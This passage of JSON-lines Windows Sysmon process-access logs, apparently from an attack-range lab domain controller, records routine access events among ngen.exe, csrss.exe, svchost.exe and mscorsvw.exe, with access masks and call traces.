\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:47.851","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21E3-5F25-0000-0010B6350A00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:47.851\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21E3-5F25-0000-0010B6350A00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:47.851","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21E3-5F25-0000-0010B6350A00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:47.851\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21E3-5F25-0000-0010B6350A00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:47.851","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21E3-5F25-0000-0010B6350A00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 